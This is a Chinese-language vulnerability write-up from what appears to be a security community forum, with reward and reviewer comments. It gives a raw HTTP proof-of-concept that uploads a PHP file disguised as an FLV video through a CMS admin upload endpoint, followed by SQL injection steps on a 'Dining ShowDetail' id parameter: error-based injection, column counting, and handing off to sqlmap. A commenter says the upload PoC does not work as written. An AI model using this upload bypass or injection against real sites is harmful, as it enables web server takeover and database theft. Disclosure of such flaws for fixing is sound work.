[POC]
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa
Content-Length: 142
------aaa
Content-Disposition: form-data; name="filePath"; filename="demo1.php"
Content-Type: video/x-flv
<?php phpinfo();?>
------aaa
上传成功
拼接路径访问
http://127.0.0.1/cms/upload/images/2023/09/25/1695620019Vzzm.php
http://127.0.0.1/index.php?g=Wap&m=Dining&a=ShowDetail&id=3
添加单引号报错
使用报错注入查看版本号
使用sqlmap读取数据库
31正常
32报错,因此存在31个字段
显错位在6,7,12
查询数据库,用户名,版本号
后续可以根据information_schema表进行查询,也可以直接丢到sqlmap
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-魔方 | 300.00 | 0 | 2023-09-25 20:08:57 | WriteUp奖励 300 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
Track-魔方
发表于 2023-9-25
手速相当快,
评论列表
加载数据中...
Track-魔方
发表于 2023-9-25
格式上再优化优化,比如加个三级标题啥的,SQL注入那里,还可以用联合注入,可以写一写,改一改我直接通过了
评论列表
加载数据中...
成风
发表于 9个月前
建议写一下这些接口怎么来的
评论列表
加载数据中...
成风
发表于 9个月前
文件上传的poc不能直接用,有问题
评论列表
加载数据中...